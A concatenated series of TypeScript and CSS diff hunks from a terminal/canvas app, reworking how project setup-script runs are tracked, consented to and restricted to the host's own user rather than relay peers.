+  pendingByGroup: {},
 
   applyEvent: (ev) => {
     const next = foldEvent(get().byRunKey[ev.runKey], ev)
@@ -146,6 +195,24 @@ export const useProjectSetup = create<ProjectSetupState>((set, get) => ({
 
   attachGroup: (groupId, runKey) =>
     set((s) => ({ groupRunKey: { ...s.groupRunKey, [groupId]: runKey } })),
+
+  markGroupPending: (groupId) =>
+    set((s) => ({
+      pendingByGroup: { ...s.pendingByGroup, [groupId]: (s.pendingByGroup[groupId] ?? 0) + 1 }
+    })),
+
+  clearGroupPending: (groupId) =>
+    set((s) => {
+      const next = (s.pendingByGroup[groupId] ?? 0) - 1
+      const pendingByGroup = { ...s.pendingByGroup }
+      // Drop the key at zero rather than keeping a 0 around: absent and zero must not be two
+      // different things to anything reading this map, and a stray extra clear cannot go negative.
+      if (next > 0) pendingByGroup[groupId] = next
+      else delete pendingByGroup[groupId]
+      return { pendingByGroup }
+    }),
+
+  pendingForGroup: (groupId) => get().pendingByGroup[groupId] ?? 0,
 
   runForProject: (projectId) => {
     const runKey = get().projectRunKey[projectId]

--- a/src/renderer/state/projectSetup.ts
+++ b/src/renderer/state/projectSetup.ts
@@ -3,18 +3,28 @@ import type { ProjectSetupEvent, ProjectSetupKind } from '@shared/project-settin
 
 /**
  * Renderer view of the setup/archive runs main is streaming (`ProjectSetupEvent` on
- * `IPC.projectSetupEvent(projectId)`). One entry per lane:
+ * `IPC.projectSetupEvent(projectId)`).
  *
- *  - `byProject` — a run the user started from the project's settings pane,
- *  - `byGroup`   — a run bound to a worktree group (Task 5 fills this from the worktree flow;
- *    the lane exists now so the shape does not change under it).
+ * ONE STORAGE LANE, `byRunKey`, fed by the events themselves — because an event carries no
+ * discriminator saying which UI raised the run. Routing by "whoever subscribed last" would put a
+ * worktree's setup run in the settings panel and a panel run in the worktree card, at random. So
+ * the initiator ATTACHES its run instead: whoever got the `started` ack (and therefore knows the
+ * `runKey`) calls `attachProject` / `attachGroup`, and `runForProject` / `runForGroup` resolve
+ * through those attachments. Events for a runKey nobody has attached are still recorded — the
+ * attachment may land a tick later, and the head of the output must survive that.
  *
- * The wire is the reason this store has any logic at all. `seq` is monotonic PER RUN precisely so
- * a client can tell a re-delivered event from a fresh one — over the relay a cast can arrive
- * twice, and out of order — so every event is measured against the last one applied and a
- * duplicate or stale one is DROPPED. Dropping is the safe direction: a lost chunk costs a few
- * bytes of visible output, whereas replaying one would duplicate output, and letting a stale
- * `running` land after a `done` would show a finished run as still going.
+ * `byRunKey` does not grow without bound: `runKey` is DETERMINISTIC (kind + location), so the key
+ * space is two entries per project location, and a re-run of the same script re-uses its slot.
+ *
+ * FOLDING, and why every field of it is load-bearing:
+ *  - a different `runId` (unique per launch) always starts a FRESH entry, even under the same
+ *    `runKey`. Two sequential runs of one script share the runKey and each restart `seq` at 1, so
+ *    without this the second run's events would be dropped as stale and the finished run's exit
+ *    badge would stand over a live script.
+ *  - within one `runId`, `seq` is the dedupe watermark: `ev.seq <= prev.seq` is DROPPED. Over the
+ *    relay a cast can arrive twice, and out of order. Dropping is the safe direction — replaying
+ *    would double the output, and a stale `running` landing after a `done` would show a finished
+ *    run as live.
  */
 
 /** How much of a run's output the panel keeps, in characters. A setup script's output is
@@ -23,23 +33,34 @@ import type { ProjectSetupEvent, ProjectSetupKind } from '@shared/project-settin
 export const SETUP_TAIL_MAX = 8 * 1024
 
 export interface SetupRunState {
+  /** The deterministic single-flight key — what `cancel` takes. */
   runKey: string
+  /** Unique per launch; what identity-of-run decisions fold on. */
+  runId: string
   kind: ProjectSetupKind
   state: ProjectSetupEvent['state']
   /** Last `SETUP_TAIL_MAX` characters of the run's output. */
   tail: string
   exitCode?: number
-  /** Highest `seq` applied for THIS `runKey` — the dedupe watermark. Lives on the entry (rather
+  /** Highest `seq` applied for THIS `runId` — the dedupe watermark. Lives on the entry (rather
    *  than a side map) so a new run resets it by construction; nothing to sweep. */
   seq: number
 }
 
 interface ProjectSetupState {
-  byProject: Record<string, SetupRunState | undefined>
-  byGroup: Record<string, SetupRunState | undefined>
-  /** Fold one event into the lane it belongs to: `groupId` when the run is a worktree's, else the
-   *  project's own lane. */
-  applyEvent(projectId: string, ev: ProjectSetupEvent, groupId?: string): void
+  /** Every run seen on the wire, keyed by its single-flight key. */
+  byRunKey: Record<string, SetupRunState | undefined>
+  /** projectId -> the runKey its own launch claimed. */
+  projectRunKey: Record<string, string | undefined>
+  /** groupId -> the runKey that worktree's launch claimed (Task 5). */
+  groupRunKey: Record<string, string | undefined>
+  /** Fold one event into `byRunKey`. Takes no lane: the lanes come from the attachments. */
+  applyEvent(ev: ProjectSetupEvent): void
+  /** Called by the initiator with the runKey main acknowledged. */
+  attachProject(projectId: string, runKey: string): void
+  attachGroup(groupId: string, runKey: string): void
+  runForProject(projectId: string): SetupRunState | undefined
+  runForGroup(groupId: string): SetupRunState | undefined
   /** Wire this project's event channel into `applyEvent`; returns the unsubscribe. The preload api
    *  ref-counts subscribe/unsubscribe per project (boardLog.onChanged's shape), so several callers
    *  may hold one at once. */
@@ -53,19 +74,15 @@ function appendTail(prev: string, chunk: string | undefined): string {
   return next.length <= SETUP_TAIL_MAX ? next : next.slice(next.length - SETUP_TAIL_MAX)
 }
 
-/**
- * The fold. Returns the next entry, or `null` when the event must be dropped.
- *
- * A DIFFERENT `runKey` always starts a fresh entry: the two runs' `seq` counters are unrelated, so
- * there is nothing to compare, and main refuses a second concurrent run for the same target
- * (`skipped: 'busy'`) — a live run's events cannot interleave with another's on the same lane.
- */
+/** The fold. Returns the next entry, or `null` when the event must be dropped. */
 function foldEvent(prev: SetupRunState | undefined, ev: ProjectSetupEvent): SetupRunState | null {
-  if (prev && prev.runKey === ev.runKey) {
+  // Same LAUNCH: apply the watermark.
+  if (prev && prev.runId === ev.runId) {
     // Duplicate (re-delivered) or stale (overtaken): the watermark has already passed it.
     if (ev.seq <= prev.seq) return null
     return {
       runKey: prev.runKey,
+      runId: prev.runId,
       kind: ev.kind,
       state: ev.state,
       tail: appendTail(prev.tail, ev.chunk),
@@ -78,8 +95,11 @@ function foldEvent(prev: SetupRunState | undefined, ev: ProjectSetupEvent): Setu
       seq: ev.seq
     }
   }
+  // A different launch (or the first one): a fresh entry — nothing of the previous run carries
+  // over, and its `seq` counter is unrelated to ours.
   return {
     runKey: ev.runKey,
+    runId: ev.runId,
     kind: ev.kind,
     state: ev.state,
     tail: appendTail('', ev.chunk),
@@ -89,23 +109,34 @@ function foldEvent(prev: SetupRunState | undefined, ev: ProjectSetupEvent): Setu
 }
 
 export const useProjectSetup = create<ProjectSetupState>((set, get) => ({
-  byProject: {},
-  byGroup: {},
+  byRunKey: {},
+  projectRunKey: {},
+  groupRunKey: {},
 
-  applyEvent: (projectId, ev, groupId) => {
-    if (groupId !== undefined) {
-      const next = foldEvent(get().byGroup[groupId], ev)
-      if (!next) return
-      set((s) => ({ byGroup: { ...s.byGroup, [groupId]: next } }))
-      return
-    }
-    const next = foldEvent(get().byProject[projectId], ev)
+  applyEvent: (ev) => {
+    const next = foldEvent(get().byRunKey[ev.runKey], ev)
     if (!next) return
-    set((s) => ({ byProject: { ...s.byProject, [projectId]: next } }))
+    set((s) => ({ byRunKey: { ...s.byRunKey, [ev.runKey]: next } }))
+  },
+
+  attachProject: (projectId, runKey) =>
+    set((s) => ({ projectRunKey: { ...s.projectRunKey, [projectId]: runKey } })),
+
+  attachGroup: (groupId, runKey) =>
+    set((s) => ({ groupRunKey: { ...s.groupRunKey, [groupId]: runKey } })),
+
+  runForProject: (projectId) => {
+    const runKey = get().projectRunKey[projectId]
+    return runKey === undefined ? undefined : get().byRunKey[runKey]
+  },
+
+  runForGroup: (groupId) => {
+    const runKey = get().groupRunKey[groupId]
+    return runKey === undefined ? undefined : get().byRunKey[runKey]
   },
 
   subscribeProject: (projectId) =>
     window.nodeTerminal.projectSetup.onEvent(projectId, (ev) => {
-      get().applyEvent(projectId, ev)
+      get().applyEvent(ev)
     })
 }))

--- a/src/renderer/state/projectSetup.ts
+++ b/src/renderer/state/projectSetup.ts
@@ -1,0 +1,111 @@
+import { create } from 'zustand'
+import type { ProjectSetupEvent, ProjectSetupKind } from '@shared/project-settings'
+
+/**
+ * Renderer view of the setup/archive runs main is streaming (`ProjectSetupEvent` on
+ * `IPC.projectSetupEvent(projectId)`). One entry per lane:
+ *
+ *  - `byProject` — a run the user started from the project's settings pane,
+ *  - `byGroup`   — a run bound to a worktree group (Task 5 fills this from the worktree flow;
+ *    the lane exists now so the shape does not change under it).
+ *
+ * The wire is the reason this store has any logic at all. `seq` is monotonic PER RUN precisely so
+ * a client can tell a re-delivered event from a fresh one — over the relay a cast can arrive
+ * twice, and out of order — so every event is measured against the last one applied and a
+ * duplicate or stale one is DROPPED. Dropping is the safe direction: a lost chunk costs a few
+ * bytes of visible output, whereas replaying one would duplicate output, and letting a stale
+ * `running` land after a `done` would show a finished run as still going.
+ */
+
+/** How much of a run's output the panel keeps, in characters. A setup script's output is
+ *  unbounded (an `npm install` alone is tens of KB) and this is a status box, not a terminal: the
+ *  END is what matters, because that is where the failure is. */
+export const SETUP_TAIL_MAX = 8 * 1024
+
+export interface SetupRunState {
+  runKey: string
+  kind: ProjectSetupKind
+  state: ProjectSetupEvent['state']
+  /** Last `SETUP_TAIL_MAX` characters of the run's output. */
+  tail: string
+  exitCode?: number
+  /** Highest `seq` applied for THIS `runKey` — the dedupe watermark. Lives on the entry (rather
+   *  than a side map) so a new run resets it by construction; nothing to sweep. */
+  seq: number
+}
+
+interface ProjectSetupState {
+  byProject: Record<string, SetupRunState | undefined>
+  byGroup: Record<string, SetupRunState | undefined>
+  /** Fold one event into the lane it belongs to: `groupId` when the run is a worktree's, else the
+   *  project's own lane. */
+  applyEvent(projectId: string, ev: ProjectSetupEvent, groupId?: string): void
+  /** Wire this project's event channel into `applyEvent`; returns the unsubscribe. The preload api
+   *  ref-counts subscribe/unsubscribe per project (boardLog.onChanged's shape), so several callers
+   *  may hold one at once. */
+  subscribeProject(projectId: string): () => void
+}
+
+/** Appends `chunk` and keeps only the last `SETUP_TAIL_MAX` characters. */
+function appendTail(prev: string, chunk: string | undefined): string {
+  if (!chunk) return prev
+  const next = prev + chunk
+  return next.length <= SETUP_TAIL_MAX ? next : next.slice(next.length - SETUP_TAIL_MAX)
+}
+
+/**
+ * The fold. Returns the next entry, or `null` when the event must be dropped.
+ *
+ * A DIFFERENT `runKey` always starts a fresh entry: the two runs' `seq` counters are unrelated, so
+ * there is nothing to compare, and main refuses a second concurrent run for the same target
+ * (`skipped: 'busy'`) — a live run's events cannot interleave with another's on the same lane.
+ */
+function foldEvent(prev: SetupRunState | undefined, ev: ProjectSetupEvent): SetupRunState | null {
+  if (prev && prev.runKey === ev.runKey) {
+    // Duplicate (re-delivered) or stale (overtaken): the watermark has already passed it.
+    if (ev.seq <= prev.seq) return null
+    return {
+      runKey: prev.runKey,
+      kind: ev.kind,
+      state: ev.state,
+      tail: appendTail(prev.tail, ev.chunk),
+      // A terminal event carries the code; a later event never un-sets one already reported.
+      ...(ev.exitCode !== undefined
+        ? { exitCode: ev.exitCode }
+        : prev.exitCode !== undefined
+          ? { exitCode: prev.exitCode }
+          : {}),
+      seq: ev.seq
+    }
+  }
+  return {
+    runKey: ev.runKey,
+    kind: ev.kind,
+    state: ev.state,
+    tail: appendTail('', ev.chunk),
+    ...(ev.exitCode !== undefined ? { exitCode: ev.exitCode } : {}),
+    seq: ev.seq
+  }
+}
+
+export const useProjectSetup = create<ProjectSetupState>((set, get) => ({
+  byProject: {},
+  byGroup: {},
+
+  applyEvent: (projectId, ev, groupId) => {
+    if (groupId !== undefined) {
+      const next = foldEvent(get().byGroup[groupId], ev)
+      if (!next) return
+      set((s) => ({ byGroup: { ...s.byGroup, [groupId]: next } }))
+      return
+    }
+    const next = foldEvent(get().byProject[projectId], ev)
+    if (!next) return
+    set((s) => ({ byProject: { ...s.byProject, [projectId]: next } }))
+  },
+
+  subscribeProject: (projectId) =>
+    window.nodeTerminal.projectSetup.onEvent(projectId, (ev) => {
+      get().applyEvent(projectId, ev)
+    })
+}))

--- a/src/renderer/state/projectSetup.ts
+++ b/src/renderer/state/projectSetup.ts
@@ -67,6 +67,28 @@ interface ProjectSetupState {
   subscribeProject(projectId: string): () => void
 }
 
+/**
+ * The gate a node armed with `PendingLaunch.awaitSetupGroup` waits on: may it run its command in
+ * this worktree yet? Pure, so the whole matrix is testable without a canvas — the caller supplies
+ * the group's run (`runForGroup`) and whether a launch for it has been REQUESTED but not yet acked.
+ *
+ * - `pending` closes the gate on its own, and it is not a micro-optimisation: `projectSetup.run`
+ *   resolves only AFTER the consent dialog is answered, so a shared-sourced script leaves this
+ *   window open for as long as the user takes to read it. The agent pattern `open-worktree` → ok →
+ *   `open-agent --group` lands squarely inside it, and without this flag those nodes would neither
+ *   be armed nor waiting — they would launch into a checkout nothing had prepared yet.
+ * - NO RUN and not pending = done. The store is rebuilt from live events, so a group with nothing on
+ *   record either never ran a script or ran one before this app start; no event is ever coming, and
+ *   reading that as "still preparing" would strand the node forever.
+ * - `failed` / `cancelled` are NOT done. The checkout is in whatever half-state the script left it,
+ *   so the node keeps holding its launch until a re-run reports `done` (the frame's chip is the
+ *   re-run affordance) or the user fires it by hand from the node's QUEUED badge.
+ */
+export function setupGateDone(run: SetupRunState | undefined, pending: boolean): boolean {
+  if (pending) return false
+  return !run || run.state === 'done'
+}
+
 /** Appends `chunk` and keeps only the last `SETUP_TAIL_MAX` characters. */
 function appendTail(prev: string, chunk: string | undefined): string {
   if (!chunk) return prev

--- a/src/renderer/styles.css
+++ b/src/renderer/styles.css
@@ -5441,6 +5441,24 @@ body,
   color: var(--warn);
 }
 
+/* Project setup/archive script state for this checkout — same quiet weight as the status
+   suffixes above; only a failure earns a color. */
+.group-node__setup {
+  font-size: 12px;
+  font-weight: 600;
+  color: var(--muted);
+  cursor: help;
+}
+
+.group-node__setup--done {
+  color: var(--success);
+}
+
+.group-node__setup--failed,
+.group-node__setup--cancelled {
+  color: var(--warn);
+}
+
 .group-node__wt-btn {
   background: var(--surface-sunken);
   border: 1px solid var(--border);

--- a/src/renderer/styles.css
+++ b/src/renderer/styles.css
@@ -5459,6 +5459,20 @@ body,
   color: var(--warn);
 }
 
+/* A failed SETUP is a button (re-run), not a label — it is the only path that can release the
+   nodes the failure left armed. Styled as the chip it replaces, plus a click affordance. */
+button.group-node__setup {
+  background: var(--surface-sunken);
+  border: 1px solid var(--border);
+  border-radius: 7px;
+  padding: 2px 8px;
+  cursor: pointer;
+}
+
+button.group-node__setup:hover {
+  background: var(--panel-header);
+}
+
 .group-node__wt-btn {
   background: var(--surface-sunken);
   border: 1px solid var(--border);

--- a/src/renderer/styles.css
+++ b/src/renderer/styles.css
@@ -5469,8 +5469,14 @@ button.group-node__setup {
   cursor: pointer;
 }
 
-button.group-node__setup:hover {
+button.group-node__setup:hover:not(:disabled) {
   background: var(--panel-header);
+}
+
+/* A launch is already in flight (or running) — the click would only earn a `busy` refusal. */
+button.group-node__setup:disabled {
+  cursor: default;
+  opacity: 0.75;
 }
 
 .group-node__wt-btn {

--- a/src/server/index.ts
+++ b/src/server/index.ts
@@ -31,6 +31,10 @@ import {
 } from '../core/model-gateway-credentials'
 import { DownloadTickets } from '../core/download-tickets'
 import { registerBoardLogHandlers, type BoardLogRoute } from '../core/board-log-handlers'
+import { ProjectTrustStore } from '../core/project-trust-store'
+import { ProjectSetupService } from '../core/project-setup-service'
+import { registerProjectSetupHandlers, type ProjectSetupHandlerService } from '../core/project-setup-handlers'
+import { makeLocalSetupRunner, resolveProjectSetupTarget } from '../core/project-setup-runner-local'
 import { LogBuffer } from '../core/log-buffer'
 import { installLogSink } from '../core/log-sink'
 import { registerLogHandlers } from '../core/log-handlers'
@@ -266,6 +270,34 @@ export async function startServer(
     downloadTickets,
     localProjectCwd: (projectId: string) => workspaceStore.localCwdForProject(projectId)
   })
+  // Project setup/archive runner — same construction + trust boundary as src/main/index.ts. No ssh
+  // leg here at all (the Server Edition has no SSH projects, same reason board-log's router below
+  // never resolves one): `resolveProjectSetupTarget` degrades an ssh-shaped index entry to
+  // `unavailable` on its own since `info.ssh` is never populated on this shell.
+  const projectTrustStore = new ProjectTrustStore()
+  const projectSetupService = new ProjectSetupService({
+    trust: projectTrustStore,
+    readSettings: (projectId) => workspaceStore.readProjectSettings(projectId),
+    runLocal: makeLocalSetupRunner()
+  })
+  // See src/main/index.ts's matching comment: `target.rootPath`/`projectName`/`ssh` on the wire are
+  // placeholders (preload/ws-bridge never send real ones) and are IGNORED here — rootPath/ssh/
+  // projectName are re-derived from this process's own workspace index by `target.projectId`, and
+  // `worktreePath` is independently re-validated against the project's actual git worktrees.
+  const projectSetupHandlerService: ProjectSetupHandlerService = {
+    run: async (target, kind) => {
+      const info = workspaceStore.projectTargetInfo(target.projectId)
+      const resolved = await resolveProjectSetupTarget(target.projectId, target.worktreePath, info, (repoPath) =>
+        gitService.worktreeList(repoPath)
+      )
+      if (!resolved) return { status: 'skipped', reason: 'unavailable' }
+      return projectSetupService.run(resolved, kind)
+    },
+    cancel: (runKey) => projectSetupService.cancel(runKey),
+    submitConsent: (requestId, answer) => projectSetupService.submitConsent(requestId, answer)
+  }
+  registerProjectSetupHandlers(platform, projectSetupHandlerService)
+
   const github = registerGitHubIntegration({
     platform,
     userDataDir: config.dataDir,

--- a/src/server/index.ts
+++ b/src/server/index.ts
@@ -33,8 +33,8 @@ import { DownloadTickets } from '../core/download-tickets'
 import { registerBoardLogHandlers, type BoardLogRoute } from '../core/board-log-handlers'
 import { ProjectTrustStore } from '../core/project-trust-store'
 import { ProjectSetupService } from '../core/project-setup-service'
-import { registerProjectSetupHandlers, type ProjectSetupHandlerService } from '../core/project-setup-handlers'
-import { makeLocalSetupRunner, resolveProjectSetupTarget } from '../core/project-setup-runner-local'
+import { registerProjectSetupHandlers } from '../core/project-setup-handlers'
+import { makeLocalSetupRunner } from '../core/project-setup-runner-local'
 import { LogBuffer } from '../core/log-buffer'
 import { installLogSink } from '../core/log-sink'
 import { registerLogHandlers } from '../core/log-handlers'
@@ -270,33 +270,23 @@ export async function startServer(
     downloadTickets,
     localProjectCwd: (projectId: string) => workspaceStore.localCwdForProject(projectId)
   })
-  // Project setup/archive runner — same construction + trust boundary as src/main/index.ts. No ssh
-  // leg here at all (the Server Edition has no SSH projects, same reason board-log's router below
-  // never resolves one): `resolveProjectSetupTarget` degrades an ssh-shaped index entry to
-  // `unavailable` on its own since `info.ssh` is never populated on this shell.
+  // Project setup/archive runner — same construction as src/main/index.ts, and the SAME
+  // `registerProjectSetupHandlers` trust boundary (project-setup-handlers.ts): it derives rootPath/
+  // ssh/projectName from THIS process's own workspace index by projectId, never the renderer, and
+  // re-validates `worktreePath` against the project's actual git worktrees. No ssh leg here at all
+  // (the Server Edition has no SSH projects, same reason board-log's router below never resolves
+  // one) — `projectTargetInfo` never populates `ssh` on this shell, so an ssh-shaped target simply
+  // never arises.
   const projectTrustStore = new ProjectTrustStore()
   const projectSetupService = new ProjectSetupService({
     trust: projectTrustStore,
     readSettings: (projectId) => workspaceStore.readProjectSettings(projectId),
     runLocal: makeLocalSetupRunner()
   })
-  // See src/main/index.ts's matching comment: `target.rootPath`/`projectName`/`ssh` on the wire are
-  // placeholders (preload/ws-bridge never send real ones) and are IGNORED here — rootPath/ssh/
-  // projectName are re-derived from this process's own workspace index by `target.projectId`, and
-  // `worktreePath` is independently re-validated against the project's actual git worktrees.
-  const projectSetupHandlerService: ProjectSetupHandlerService = {
-    run: async (target, kind) => {
-      const info = workspaceStore.projectTargetInfo(target.projectId)
-      const resolved = await resolveProjectSetupTarget(target.projectId, target.worktreePath, info, (repoPath) =>
-        gitService.worktreeList(repoPath)
-      )
-      if (!resolved) return { status: 'skipped', reason: 'unavailable' }
-      return projectSetupService.run(resolved, kind)
-    },
-    cancel: (runKey) => projectSetupService.cancel(runKey),
-    submitConsent: (requestId, answer) => projectSetupService.submitConsent(requestId, answer)
-  }
-  registerProjectSetupHandlers(platform, projectSetupHandlerService)
+  registerProjectSetupHandlers(platform, projectSetupService, {
+    projectTargetInfo: (projectId) => workspaceStore.projectTargetInfo(projectId),
+    worktreeList: (repoPath) => gitService.worktreeList(repoPath)
+  })
 
   const github = registerGitHubIntegration({
     platform,

--- a/src/server/index.ts
+++ b/src/server/index.ts
@@ -625,6 +625,9 @@ export async function startServer(
     return {
       port: 0, // nothing bound
       async close() {
+        // Kill any in-flight setup/archive run: it is a detached process group, so nothing else in
+        // this teardown reaches it. Same call, same reason, in the serving branch's close() below.
+        projectSetupService.disposeAll()
         // Detach PTY clients — tmux sessions keep running (Phase 1 contract).
         sessionReaper.stop()
         pressure.stop()
@@ -677,6 +680,9 @@ export async function startServer(
   return {
     port,
     async close() {
+      // Kill any in-flight setup/archive run first: it is a detached process group (setsid), so
+      // neither the WS teardown nor ptyManager.killAll() below would ever reach it.
+      projectSetupService.disposeAll()
       // Detach PTY clients — tmux sessions keep running (Phase 1 contract; never kill the server).
       sessionReaper.stop()
       pressure.stop()

--- a/src/shared/host-control.test.ts
+++ b/src/shared/host-control.test.ts
@@ -1,0 +1,39 @@
+import { describe, it, expect } from 'vitest'
+import { IPC } from './ipc'
+import { HOST_ONLY_REFUSAL, isHostOnlyChannel } from './host-control'
+
+/**
+ * The ONE list both shells consult. It exists so the desktop's relay admission and any future
+ * shell cannot drift: a channel that only the host's own human may reach is named here, not in a
+ * per-shell `startsWith` that one of them forgets to copy.
+ */
+describe('isHostOnlyChannel', () => {
+  it('covers the whole GitHub host-control namespace by prefix', () => {
+    expect(isHostOnlyChannel(IPC.githubControlApprove)).toBe(true)
+    expect(isHostOnlyChannel(IPC.githubControlSaveToken)).toBe(true)
+    // A namespace, not a fixed list: a method added later is gated the day it is added.
+    expect(isHostOnlyChannel('githubControl:something-new')).toBe(true)
+  })
+
+  it('covers the three project-setup channels that can START or APPROVE a shared script', () => {
+    expect(isHostOnlyChannel(IPC.projectSetupRun)).toBe(true)
+    expect(isHostOnlyChannel(IPC.projectSetupConsentSubmit)).toBe(true)
+    expect(isHostOnlyChannel(IPC.projectSetupCancel)).toBe(true)
+  })
+
+  it('leaves the read-only/lifecycle channels alone — the gate is on ACTION, not on the namespace', () => {
+    // Subscribing and receiving events costs a guest nothing the canvas does not already show;
+    // running host code, and answering the host's own trust prompt, are the two acts being gated.
+    expect(isHostOnlyChannel(IPC.projectSetupSubscribe)).toBe(false)
+    expect(isHostOnlyChannel(IPC.projectSetupUnsubscribe)).toBe(false)
+    expect(isHostOnlyChannel(IPC.projectSetupEvent('p1'))).toBe(false)
+    expect(isHostOnlyChannel(IPC.ptyWrite)).toBe(false)
+    // Near-misses must not be swallowed by a sloppy prefix.
+    expect(isHostOnlyChannel('project-setup:run-something-else')).toBe(false)
+    expect(isHostOnlyChannel('notgithubControl:approve')).toBe(false)
+  })
+
+  it('carries the refusal wording the peer sees, so both shells answer identically', () => {
+    expect(HOST_ONLY_REFUSAL).toBe('host-control method is not available to relay peers')
+  })
+})

--- a/src/shared/host-control.ts
+++ b/src/shared/host-control.ts
@@ -1,0 +1,42 @@
+import { IPC } from './ipc'
+
+/**
+ * HOST-ONLY channels: the RPC methods a relay GUEST may never reach, in ONE list both shells read.
+ *
+ * A relay peer (a paired phone, another desktop over 4c) is a first-class client of this machine's
+ * core — that is the point of the peer registry — but it is NOT the host's user. A small set of
+ * methods are the host's own control plane, and admitting one of them from a guest hands over
+ * something the guest could not otherwise have:
+ *
+ *  - `githubControl:*` — the token/approval plane for the host's GitHub credentials.
+ *  - `project-setup:run` — starts a script ON the host, in the host's shell, as the host's user.
+ *  - `project-setup:consent-submit` — the ANSWER to the host's own trust prompt. Admitting `run`
+ *    and this one together is the whole attack: a guest raises the prompt and then approves it
+ *    itself, so a shared `.nodeterm/project.json` script executes with no human ever looking at a
+ *    dialog. Either one alone is much weaker; the pair is a complete self-approval loop.
+ *  - `project-setup:cancel` — the other side of the same run's control: a guest must not be able to
+ *    kill the host's setup mid-write.
+ *
+ * DELIBERATELY NOT LISTED: `project-setup:subscribe`/`unsubscribe` and the `project-setup:event:*`
+ * push. They neither start nor authorize anything, and a peer that can see the canvas can already
+ * see that a setup is running. The gate is on ACTION, not on the namespace — which is also why
+ * this is an explicit list rather than a `project-setup:` prefix.
+ *
+ * This lives in `shared/` because it is a policy question, not a shell mechanism: two shells each
+ * carrying their own `startsWith` is exactly how one of them ends up a release behind the other.
+ */
+export const HOST_ONLY_CHANNEL_PREFIXES: readonly string[] = ['githubControl:']
+
+export const HOST_ONLY_CHANNELS: ReadonlySet<string> = new Set([
+  IPC.projectSetupRun,
+  IPC.projectSetupCancel,
+  IPC.projectSetupConsentSubmit
+])
+
+/** What a refused peer is told. One wording, so the two shells answer identically. */
+export const HOST_ONLY_REFUSAL = 'host-control method is not available to relay peers'
+
+export function isHostOnlyChannel(channel: string): boolean {
+  if (HOST_ONLY_CHANNELS.has(channel)) return true
+  return HOST_ONLY_CHANNEL_PREFIXES.some((prefix) => channel.startsWith(prefix))
+}

--- a/src/shared/ipc.ts
+++ b/src/shared/ipc.ts
@@ -241,8 +241,10 @@ export const IPC = {
   projectSettingsRead: 'project-settings:read',
   projectSettingsWriteShared: 'project-settings:write-shared',
   projectSettingsUpdateLocal: 'project-settings:update-local',
-  /** Run a project's setup/archive script. Answers a ProjectSetupRunResult — `started` only means
-   *  the run was admitted (gated + single-flight), not that it finished; progress arrives on
+  /** Run a project's setup/archive script. Args: (projectId, kind, worktreePath?) — NO rootPath/
+   *  projectName/ssh: the handler derives those itself from its own workspace index by projectId,
+   *  never the caller (project-setup-handlers.ts). Answers a ProjectSetupRunResult — `started` only
+   *  means the run was admitted (gated + single-flight), not that it finished; progress arrives on
    *  projectSetupEvent. */
   projectSetupRun: 'project-setup:run',
   projectSetupCancel: 'project-setup:cancel',

--- a/src/shared/ipc.ts
+++ b/src/shared/ipc.ts
@@ -241,6 +241,22 @@ export const IPC = {
   projectSettingsRead: 'project-settings:read',
   projectSettingsWriteShared: 'project-settings:write-shared',
   projectSettingsUpdateLocal: 'project-settings:update-local',
+  /** Run a project's setup/archive script. Answers a ProjectSetupRunResult — `started` only means
+   *  the run was admitted (gated + single-flight), not that it finished; progress arrives on
+   *  projectSetupEvent. */
+  projectSetupRun: 'project-setup:run',
+  projectSetupCancel: 'project-setup:cancel',
+  /** Renderer's answer to a projectSetupConsentRequest ('approve' | 'skip'). A stale/unknown
+   *  requestId is a silent no-op — an expired prompt can never be approved late. */
+  projectSetupConsentSubmit: 'project-setup:consent-submit',
+  /** main→renderer: raise the trust dialog (payload: ProjectSetupConsentRequest). */
+  projectSetupConsentRequest: 'project-setup:consent-request',
+  /** main→renderer: close a prompt nobody answered (payload: { requestId }). */
+  projectSetupConsentDismiss: 'project-setup:consent-dismiss',
+  /** Per-project push carrying a ProjectSetupEvent (mirrors the boardLogChanged naming). */
+  projectSetupEvent: (projectId: string) => `project-setup:event:${projectId}`,
+  projectSetupSubscribe: 'project-setup:subscribe',
+  projectSetupUnsubscribe: 'project-setup:unsubscribe',
   // main → renderer events
   workspaceMigrated: 'workspace:migrated',
   /** Payload: the `workspace.json.corrupt-<ts>` filename the unreadable index was preserved as. */

--- a/src/shared/project-settings.ts
+++ b/src/shared/project-settings.ts
@@ -361,14 +361,23 @@ export interface ProjectSetupConsentRequest {
 export type ProjectSetupConsentAnswer = 'approve' | 'skip'
 
 export type ProjectSetupRunResult =
-  | { status: 'started'; runKey: string; waitForSetup: boolean }
+  | { status: 'started'; runKey: string; runId: string; waitForSetup: boolean }
   | { status: 'skipped'; reason: 'no-script' | 'declined' | 'unanswered' | 'busy' | 'unavailable' }
 
 /** main→renderer per-run progress on `IPC.projectSetupEvent(projectId)`. `seq` is monotonic per
  *  run, so a client that misses one knows it. */
 export interface ProjectSetupEvent {
+  /** The SINGLE-FLIGHT key: deterministic (kind + location), so a second launch of the same script
+   *  at the same place is refused as `busy`. It is therefore NOT unique over time — two sequential
+   *  runs of the same script share it. */
   runKey: string
+  /** Unique per RUN (a fresh uuid each launch). This is what a client folds on: two sequential runs
+   *  share a `runKey`, so without it the second run's events look like a continuation of the first
+   *  — its `seq` restarts at 1 and would be dropped as stale, leaving the finished run's exit badge
+   *  standing over a live script. */
+  runId: string
   kind: ProjectSetupKind
+  /** Monotonic within one `runId`, from 1. */
   seq: number
   state: 'running' | 'done' | 'failed' | 'cancelled'
   /** Appended output since the last event (stdout+stderr interleaved, capped). */

--- a/src/shared/project-settings.ts
+++ b/src/shared/project-settings.ts
@@ -340,17 +340,19 @@ export type ProjectTrustFamily = 'setup' | 'agents' | 'shell'
 /** Which of the setup family's two scripts a run executes. */
 export type ProjectSetupKind = 'setup' | 'archive'
 
-/** main→renderer: raise the consent dialog for ONE shared-sourced script about to run. Approving
- *  covers the whole `setup` family (both scripts are hashed together), so `script` is what is about
- *  to run, not the full extent of what is being approved — the dialog says so. */
+/** main→renderer: raise the consent dialog before a shared-sourced script runs. One answer approves
+ *  the whole `setup` family (both scripts are hashed together), so the payload carries BOTH — a
+ *  dialog must be able to show everything the approval covers, not just the half about to run. */
 export interface ProjectSetupConsentRequest {
   requestId: string
+  /** Which script is about to run — the one the dialog highlights. */
   kind: ProjectSetupKind
   projectName: string
   /** Human-readable location ("~/code/app" or "user@host:/srv/app"). */
   locationLabel: string
-  /** The script about to run (the family's OTHER script is covered by the same approval). */
-  script: string
+  /** The family's full executable content, straight from the SHARED document: exactly what the
+   *  approved hash covers. A field is absent when that script is not set. */
+  scripts: { setup?: string; archive?: string }
   /** A prior approval exists for this family at this location (dialog copy: "changed since you
